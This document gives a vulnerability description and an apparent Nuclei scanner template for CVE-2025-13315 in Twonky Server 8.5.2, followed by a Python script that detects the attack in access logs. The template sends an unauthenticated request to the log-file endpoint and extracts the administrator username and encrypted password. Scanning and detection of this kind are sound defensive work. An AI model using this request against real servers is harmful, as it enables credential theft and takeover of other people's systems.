Vulnerability Description
Twonky Server 8.5.2 contains a broken access control vulnerability: authentication for the web service API can be bypassed, which lets unauthenticated attackers read log files that contain administrator credentials. Exploitation requires no authentication.
id: CVE-2025-13315
info:
  name: Twonky Server 8.5.2 on Linux and Windows - Log File Exposure
  author: pussycat0x
  severity: critical
  description: |
    Twonky Server 8.5.2 contains a broken access control vulnerability caused by bypassing web service API authentication, letting unauthenticated attackers read log files with administrator credentials, exploit requires no authentication
  remediation: |
    Restrict access to the Twonky Server web service API or implement network segmentation as the vendor has not released a fix.
  impact: |
    Unauthenticated attackers can read sensitive log files containing administrator usernames and encrypted passwords.
  reference:
    - https://www.rapid7.com/blog/post/cve-2025-13315-cve-2025-13316-critical-twonky-server-authentication-bypass-not-fixed/
  metadata:
    verified: true
    zoomeye-query: app="Twonky Server"
  tags: cve,cve2025,twonky,server,exposure,unauth,vkev
http:
  - method: GET
    path:
      - "{{BaseURL}}/nmc/rpc/log_getfile"
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body,"server_main_impl","LOG_SYSTEM:","upnp_ini_file")'
        condition: and
    extractors:
      - type: regex
        name: username
        group: 1
        part: body
        regex:
          - 'accessuser =([ a-zA-Z0-9]+)'
        internal: true
      - type: regex
        name: password
        part: body
        group: 1
        regex:
          - 'accesspwd =([ :a-zA-Z0-9]+)'
        internal: true
      - type: dsl
        dsl:
          - '"Username :"+ trim(username, "[ ]")'
          - '"EncryptedPassword :"+ trim(password, "[ ]")'
# digest: 4a0a004730450220429082d2aa489ae0606c267c76184eddc72ddd9cbc29d705d63a70967c0e95a6022100d0af8450e27beffffcf0145cb940985676eb324bef1ca132e720a12d3f84aa67:922c64590222798bb761d5b6d8e72950
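
A defender-side check for the request this template sends, added here as an example that is not part of the original template: it scans access logs for successful reads of `/nmc/rpc/log_getfile` and reports which clients fall outside the trusted networks. The log format, the `TRUSTED_NETS` range, the function names and the sample lines are assumptions constructed for illustration.

```python
import ipaddress
import re
from collections import defaultdict
from urllib.parse import unquote, urlsplit

LOG_ENDPOINT = "/nmc/rpc/log_getfile"  # path requested by the template above
# Assumption: networks that are allowed to reach the Twonky web service API.
TRUSTED_NETS = [ipaddress.ip_network("192.168.1.0/24")]
# Assumption: common/combined log format written by a proxy in front of Twonky.
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "[A-Z]+ (?P<target>\S+) '
                     r'[^"]*" (?P<status>\d{3}) (?P<size>\d+|-)')
# Constructed sample lines for illustration; not taken from a real system.
SAMPLE_LOG = """\
192.168.1.20 - - [02/Dec/2025:10:01:11 +0000] "GET /nmc/rpc/log_getfile HTTP/1.1" 200 48213
203.0.113.7 - - [02/Dec/2025:10:02:40 +0000] "GET /nmc/rpc/log_getfile HTTP/1.1" 200 48213
198.51.100.9 - - [02/Dec/2025:10:05:03 +0000] "GET /nmc/rpc/log_getfile?x=1 HTTP/1.1" 200 48213
198.51.100.9 - - [02/Dec/2025:10:05:09 +0000] "GET /nmc/rpc/log_getfile HTTP/1.1" 403 162
not an access log line
"""


def find_log_reads(lines):
    """Map client IP -> [(timestamp, status, size)] for log_getfile requests."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # line is not in the expected format
        # Normalise: drop the query string, decode %xx, ignore a trailing slash.
        path = unquote(urlsplit(m["target"]).path).rstrip("/")
        if path == LOG_ENDPOINT:
            size = 0 if m["size"] == "-" else int(m["size"])
            hits[m["ip"]].append((m["ts"], int(m["status"]), size))
    return dict(hits)


def exposed_clients(hits):
    """Clients that got a 200 with a body, with whether their address is trusted."""
    out = {}
    for ip, events in hits.items():
        reads = sum(1 for _, status, size in events if status == 200 and size > 0)
        try:
            trusted = any(ipaddress.ip_address(ip) in n for n in TRUSTED_NETS)
        except ValueError:
            trusted = False  # hostname or malformed address
        if reads:
            out[ip] = {"reads": reads, "trusted": trusted}
    return out
```

Any untrusted client reported by `exposed_clients` should be treated as having obtained the administrator username and encrypted password from the log.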